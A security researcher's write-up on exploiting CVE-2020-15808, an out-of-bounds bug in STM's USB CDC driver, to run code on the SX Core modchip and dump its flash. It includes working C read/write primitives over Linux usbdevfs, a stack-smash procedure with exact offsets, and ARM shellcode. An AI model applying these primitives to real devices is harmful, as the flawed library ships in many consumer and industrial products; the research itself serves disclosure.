pixel-stuck/writeup.md

Hacking the SX Core modchip

Background

On October 2nd 2020, CVE-2020-15808 was publicly announced, detailing an out-of-bounds memory read/write vulnerability in STM's microcontroller firmware. Any chip whose firmware uses STM's USB CDC driver library contains the bugged code, which covers a large number of products on the market. While bugged STM libraries are bad enough, the problem is much more widespread. Several companies manufacture "clones" of STM chips which, thanks to mostly identical MMIO (Memory Mapped Input/Output) addresses, fully support the affected STM vendor code. Most clone manufacturers don't offer their own libraries, so developers must either write their own from scratch or use STM's existing libraries, and most clone manufacturers encourage the latter.
Armed with this information, I became interested in exploiting and dumping the flash on the "Team Xecuter" SX Core modchip for the Nintendo Switch. The MCU used on the chip is the GD32F350CBT6, which exposes a serial console over USB using STM's library as a base. Used in combination with an FPGA, the chip makes use of voltage glitching to obtain code execution on the console.
USB Yak-shaving

My initial goals were:

Understanding what conditions trigger the bug
Learning how to replicate those conditions via the USB port on my PC

The answer to the first question is relatively simple, but requires understanding a bit about USB. USB has different kinds of data transfers, one of which is the "Control Transfer". The expected structure of a control transfer request (the setup packet) is shown here:


| Offset | Field | Size (bytes) | Data Type | Description |
|---|---|---|---|---|
| 0 | bmRequestType | 1 | Bit-Field | D7: Data Direction (0 = Host to Device, 1 = Device to Host); D6:5: Type (00 = Standard, 01 = Class, 10 = Vendor, 11 = Reserved); D4:0: Recipient (00000 = Device, 00001 = Interface, 00010 = Endpoint, 00011 = Other, otherwise reserved) |
| 1 | bRequest | 1 | Value | Request-specific |
| 2 | wValue | 2 | Value | Request-specific |
| 4 | wIndex | 2 | Index/Offset | Request-specific |
| 6 | wLength | 2 | Count | Number of bytes to be transferred |
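
To make the layout above concrete, here is a minimal sketch in C that packs the bmRequestType bit-field and serializes the 8-byte setup packet. The enum and function names are illustrative only and do not come from any USB library; the field positions and the little-endian byte order follow the USB specification.

```c
#include <assert.h>
#include <stdint.h>

/* Field values from the layout above (names are illustrative). */
enum { DIR_HOST_TO_DEVICE = 0, DIR_DEVICE_TO_HOST = 1 };
enum { TYPE_STANDARD = 0, TYPE_CLASS = 1, TYPE_VENDOR = 2 };
enum { RECIP_DEVICE = 0, RECIP_INTERFACE = 1, RECIP_ENDPOINT = 2, RECIP_OTHER = 3 };

/* Pack direction (D7), type (D6:5) and recipient (D4:0) into one byte. */
static uint8_t make_bm_request_type(unsigned dir, unsigned type, unsigned recip)
{
    assert(dir <= 1 && type <= 3 && recip <= 31);
    return (uint8_t)((dir << 7) | (type << 5) | recip);
}

/* Serialize the setup packet; 16-bit fields are little-endian on the wire. */
static void pack_setup(uint8_t out[8], uint8_t bmRequestType, uint8_t bRequest,
                       uint16_t wValue, uint16_t wIndex, uint16_t wLength)
{
    out[0] = bmRequestType;
    out[1] = bRequest;
    out[2] = (uint8_t)(wValue & 0xff);
    out[3] = (uint8_t)(wValue >> 8);
    out[4] = (uint8_t)(wIndex & 0xff);
    out[5] = (uint8_t)(wIndex >> 8);
    out[6] = (uint8_t)(wLength & 0xff);
    out[7] = (uint8_t)(wLength >> 8);
}
```

For example, a device-to-host class request addressed to the device packs to 0xA0, and a host-to-device class request addressed to an interface packs to 0x21.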


Taking a look at the vulnerable code, we should be able to figure out what exactly to send.
  switch (req->bmRequest & USB_REQ_TYPE_MASK)
  {
    /* CDC Class Requests -------------------------------*/
  case USB_REQ_TYPE_CLASS :
      /* Check if the request is a data setup packet */
      if (req->wLength)
      {
        /* Check if the request is Device-to-Host */
        if (req->bmRequest & 0x80)
        {
          /* Get the data to be sent to Host from interface layer */
          APP_FOPS.pIf_Ctrl(req->bRequest, CmdBuff, req->wLength);
          
          /* Send the data to the host */
          USBD_CtlSendData (pdev, 
                            CmdBuff,
                            req->wLength);          
        }
        else /* Host-to-Device requeset */
        {
          /* Set the value of the current command to be processed */
          cdcCmd = req->bRequest;
          cdcLen = req->wLength;
          
          /* Prepare the reception of the buffer over EP0
          Next step: the received data will be managed in usbd_cdc_EP0_TxSent() 
          function. */
          USBD_CtlPrepareRx (pdev,
                             CmdBuff,
                             req->wLength);          
        }
      }
      else /* No Data request */
      {
        /* Transfer the command to the interface layer */
        APP_FOPS.pIf_Ctrl(req->bRequest, NULL, 0);
      }
Reading through this code, the answer to question one becomes obvious: wLength is never checked against the size of CmdBuff, so any time a valid USB control transfer of type "class" is sent to the chip with a large wLength, an out-of-bounds read or write is triggered.
It is a bit more nuanced than that, as different CDC implementations can use different values for bRequest, and this is part of what makes a particular request "valid" or not. Sending an incorrect bRequest value, even with everything else correct, will get you nothing back from the USB device.
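
As a rough model of the flaw, the sketch below contrasts using the host-supplied wLength directly with clamping it to the buffer size. This is only an illustration: `CMD_BUFF_SIZE` is a hypothetical stand-in for the real size of `CmdBuff`, the function names are invented for this example, and clamping is just one possible guard (rejecting the request outright would be another), not necessarily what any vendor fix does.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical size of the driver's command buffer; the real value
   depends on the firmware build. */
#define CMD_BUFF_SIZE 8u

/* Vulnerable behaviour: the host-supplied wLength is used as-is. */
static size_t transfer_len_unchecked(uint16_t wLength)
{
    return wLength;
}

/* One possible guard: never transfer more bytes than the buffer holds. */
static size_t transfer_len_clamped(uint16_t wLength)
{
    return wLength < CMD_BUFF_SIZE ? wLength : CMD_BUFF_SIZE;
}

/* Number of bytes a transfer of `len` bytes would touch past the buffer. */
static size_t overrun_bytes(size_t len)
{
    assert(CMD_BUFF_SIZE > 0);
    return len > CMD_BUFF_SIZE ? len - CMD_BUFF_SIZE : 0;
}
```

With the unchecked length, a request for 0x1000 bytes reaches far past the buffer; with the clamp, the overrun is zero regardless of what the host asks for.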
In order to answer the second question, I experimented with the Linux kernel's usbdevfs interface and its URBs, or "USB Request Blocks". I found I could trigger the out-of-bounds read with the following code:
  ...
  struct usbdevfs_ctrltransfer urb;
  memset(&urb, 0, sizeof (urb));
  uint8_t *buffer = malloc(0x1000);

  /* Device-to-host class request: the device answers with wLength bytes
     starting at CmdBuff, regardless of how large CmdBuff really is. */
  urb.bRequestType = USB_DIR_IN | USB_TYPE_CLASS | USB_RECIP_DEVICE;
  urb.bRequest = USB_CDC_REQ_GET_LINE_CODING;
  urb.wValue = 0;
  urb.wIndex = 0;
  urb.data = buffer;
  urb.wLength = 0x1000;
  urb.timeout = 5000; /* in milliseconds */
  
  int rc = ioctl(usb_fd, USBDEVFS_CONTROL, &urb);
  if (rc < 0) {
    perror("USBDEVFS_CONTROL");
    exit(EXIT_FAILURE);
  }
This allowed me to confirm the bug. However, the Linux kernel limits the amount of data that can be read with this method of sending the control request. In my case, I could only dump 0x1000 bytes. That said, it was a starting point, and I had some direction from my earlier experimentation and from the work of @DavidBuchanan314. David's minimalist exploit implementation of a similar bug (CVE-2018-6242) showed me how to send an unbounded control transfer. After adapting my working implementation, I ended up with two functions: a read primitive and a write primitive.
/* Read `length` bytes from the device with a single control transfer.
   Returns 0 on success, a negative value on failure. */
int ctrl_transfer_unbounded_read(int fd, int length, char *buf_out)
{
    int rc = 0;
    int buf_size = sizeof(struct usb_ctrlrequest) + length;
    uint8_t *buffer = calloc(1, buf_size);
    struct usbdevfs_urb *purb;

    if (buffer == NULL)
        return -3;

    /* The 8-byte setup packet sits at the start of the URB buffer and the
       data stage follows it. wValue stays 0 from calloc(). */
    struct usb_ctrlrequest *ctrl_req = (struct usb_ctrlrequest *) buffer;
    ctrl_req->bRequestType = USB_DIR_IN | USB_TYPE_CLASS | USB_RECIP_DEVICE;
    ctrl_req->bRequest = USB_CDC_REQ_GET_LINE_CODING;
    ctrl_req->wIndex = 0;
    ctrl_req->wLength = length;

    struct usbdevfs_urb urb = {
        .type = USBDEVFS_URB_TYPE_CONTROL,
        .endpoint = 0,
        .buffer = buffer,
        .buffer_length = buf_size,
        .usercontext = (void *) 0x1337,
    };

    if (ioctl(fd, USBDEVFS_SUBMITURB, &urb) < 0)
        rc = -1;
    else if (ioctl(fd, USBDEVFS_REAPURB, &purb) < 0)
        rc = -2;
    else
        memcpy(buf_out, buffer + sizeof(struct usb_ctrlrequest), length);

    free(buffer); /* released on the error paths too */

    return rc;
}

/* Write `length` bytes from `buf` to the device with a single control transfer.
   Returns 0 on success, a negative value on failure. */
int ctrl_transfer_unbounded_write(int fd, int length, char *buf)
{
    int rc = 0;
    int buf_size = sizeof(struct usb_ctrlrequest) + length;
    uint8_t *buffer = calloc(1, buf_size);
    struct usbdevfs_urb *purb;

    if (buffer == NULL)
        return -3;

    /* Payload goes right after the 8-byte setup packet. */
    memcpy(buffer + sizeof(struct usb_ctrlrequest), buf, length);

    struct usb_ctrlrequest *ctrl_req = (struct usb_ctrlrequest *) buffer;
    ctrl_req->bRequestType = USB_DIR_OUT | USB_TYPE_CLASS | USB_RECIP_INTERFACE;
    ctrl_req->bRequest = USB_CDC_REQ_SET_LINE_CODING;
    ctrl_req->wIndex = 0;
    ctrl_req->wLength = length;

    struct usbdevfs_urb urb = {
        .type = USBDEVFS_URB_TYPE_CONTROL,
        .endpoint = 0,
        .buffer = buffer,
        .buffer_length = buf_size,
        .usercontext = (void *) 0x1337,
    };

    if (ioctl(fd, USBDEVFS_SUBMITURB, &urb) < 0)
        rc = -1;
    else if (ioctl(fd, USBDEVFS_REAPURB, &purb) < 0)
        rc = -2;

    free(buffer); /* released on the error paths too */

    return rc;
}
Gaining arbitrary code execution

After implementing my read/write primitives, along with some more logic to easily specify an operation (read/write) and a destination/source file, the experimentation began. In the past, I had been able to get an SRAM dump via the SWD debug port after the CDC driver had run. Debug access was not enough to dump the internal flash of the device, as flash reads/writes were disabled, so this bug needed to be leveraged. That earlier RAM dump allowed me to find where the buffer was located within the 16 KiB SRAM.

Through experimentation and examination of the data, I determined that the stack pointer was initially set to 0x20002000, the boundary between the lower and upper halves of SRAM. Our buffer started at 0x20000244, which made it the perfect target for some shellcode and a stack smash. Sending anything over 0x1d08 bytes to the chip via our write primitive would crash it, and reading the SRAM at the location where the write caused the crash revealed a return address. Reading 0x1d0c bytes from the chip and immediately sending them back, however, did not cause a crash, and the chip retained full USB functionality. After some more experimentation, I came up with the following exploit procedure:

Perform a read of 0x1d0c bytes from the chip
Insert some shellcode at the beginning of what we just read
Modify the return address to point to the shellcode
Write the now-modified RAM dump back to the chip
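
The middle two steps can be sketched as a small C helper that patches the dump in place. The buffer address and dump length come from the text above; the offset of the saved return address (0x1d08, which corresponds to SRAM address 0x20000244 + 0x1d08 = 0x20001F4C) is inferred from the crash threshold and should be treated as an assumption, as should the helper's name and signature. The low bit of the new return address is set because the core executes Thumb code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define BUFFER_ADDR  0x20000244u /* start of the CDC buffer in SRAM (from the text) */
#define DUMP_LEN     0x1d0cu     /* bytes read back from the chip (from the text) */
#define RET_ADDR_OFF 0x1d08u     /* assumed offset of the saved return address */

/* Patch a RAM dump in place: copy the shellcode to the start of the dump and
   redirect the saved return address to it. Returns 0 on success, -1 if the
   dump is too short or the shellcode would overlap the return address. */
static int patch_dump(uint8_t *dump, size_t dump_len,
                      const uint8_t *shellcode, size_t shellcode_len)
{
    assert(dump != NULL && shellcode != NULL);
    if (dump_len < RET_ADDR_OFF + 4 || shellcode_len > RET_ADDR_OFF)
        return -1;

    memcpy(dump, shellcode, shellcode_len);

    /* Bit 0 set selects Thumb state; stored little-endian like the original. */
    uint32_t target = BUFFER_ADDR | 1u;
    dump[RET_ADDR_OFF + 0] = (uint8_t)(target & 0xff);
    dump[RET_ADDR_OFF + 1] = (uint8_t)((target >> 8) & 0xff);
    dump[RET_ADDR_OFF + 2] = (uint8_t)((target >> 16) & 0xff);
    dump[RET_ADDR_OFF + 3] = (uint8_t)((target >> 24) & 0xff);
    return 0;
}
```

A caller would read DUMP_LEN bytes with the read primitive, run `patch_dump` on the result, and send the same number of bytes back with the write primitive.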

This leads to arbitrary code execution on the chip. However, we still don't have a way to read the results: the chip is now running our code, not the USB CDC driver code. With some carefully crafted shellcode, maybe we can come up with a solution.
The shellcode

Our goal was to read out the flash on the chip, so first we need to know where the flash is located. Thankfully, the datasheet for this MCU has the memory layout; flash is at address 0x08000000. Our particular model had 64 KiB for the "code area" and 64 KiB for the "data area". Our SRAM was only 16 KiB, so we couldn't dump it all in one go, and in order to retain functionality, we also had to make sure any important registers didn't get overwritten. For this reason, I decided to read 0x2000 bytes at a time into the unused upper half of the SRAM, which takes sixteen iterations to dump all of flash. Since I also wanted to return to normal execution after I was done, I had to be sure not to clobber any registers that needed to be preserved; to achieve this, I used only the "argument" registers (r0-r3), which can be clobbered freely. I ended up with the following ARM assembly:
.thumb

start:
  ldr r0, =0x08000000 @ start of flash. Modify this to read the location desired
  ldr r1, =0x20002000 @ destination
  ldr r2, =0x2000     @ size to read
wordcopy:
  ldr r3, [r0]        @ read the word from source
  add r0, r0, #4      @ increment source address
  str r3, [r1]        @ store the word at destination
  add r1, r1, #4      @ increment destination address
  sub r2, r2, #4      @ decrement the size
  cmp r2, #0          @ check if size left to copy is 0
  bne wordcopy        @ loop while there is data left to copy, otherwise fall through
  ldr r0, =0x080006B9 @ load original return address into r0
  bx r0               @ jump back to original return address

.pool
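
For readers less familiar with ARM assembly, the following is a rough C restatement of the copy loop together with the chunk arithmetic behind the sixteen iterations. It is a host-side sketch, not code that ran on the chip: the function and macro names are made up for this example, and it assumes the code and data areas are contiguous starting at 0x08000000.

```c
#include <assert.h>
#include <stdint.h>

#define FLASH_START 0x08000000u     /* start of flash (from the datasheet) */
#define FLASH_TOTAL (128u * 1024u)  /* 64 KiB code area + 64 KiB data area */
#define CHUNK_SIZE  0x2000u         /* bytes copied per shellcode run */

/* Number of shellcode runs needed to cover all of flash. */
static unsigned chunk_count(void)
{
    return FLASH_TOTAL / CHUNK_SIZE;
}

/* Source address to patch into the first ldr for run number i. */
static uint32_t chunk_source(unsigned i)
{
    assert(i < chunk_count());
    return FLASH_START + i * CHUNK_SIZE;
}

/* C equivalent of the wordcopy loop; size must be a non-zero multiple of 4,
   just as in the assembly version. */
static void word_copy(uint32_t *dst, const uint32_t *src, uint32_t size)
{
    do {
        *dst++ = *src++;
        size -= 4;
    } while (size != 0);
}
```

Each run copies one chunk into the upper half of SRAM, after which the read primitive can fetch it over USB before the next source address is patched in.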

Conclusion

Vendor drivers may be a convenient starting point or solution, but proper auditing of code is strongly advised for any device you create, regardless of where the code originated. Due to this oversight, a seemingly simple bug has left a massive number of devices vulnerable. The impact of our example case may be low, but as chips using this code are widespread in both consumer and industrial applications, the potential for a highly damaging scenario exists.
Furthermore, STM did not act as a responsible vendor when presented with the CVE. Eschewing a graceful response to the researcher, it instead provided no response at all. Due to this lack of reciprocation alongside a more than reasonable amount of time, the researcher opted to disclose the vulnerability publicly. A responsible vendor would have made efforts to communicate with the researcher in a timely manner. It would then attempt to mitigate the situation by promptly notifying companies with affected products, ensuring sufficient time to patch the vulnerability to prevent or mitigate damage.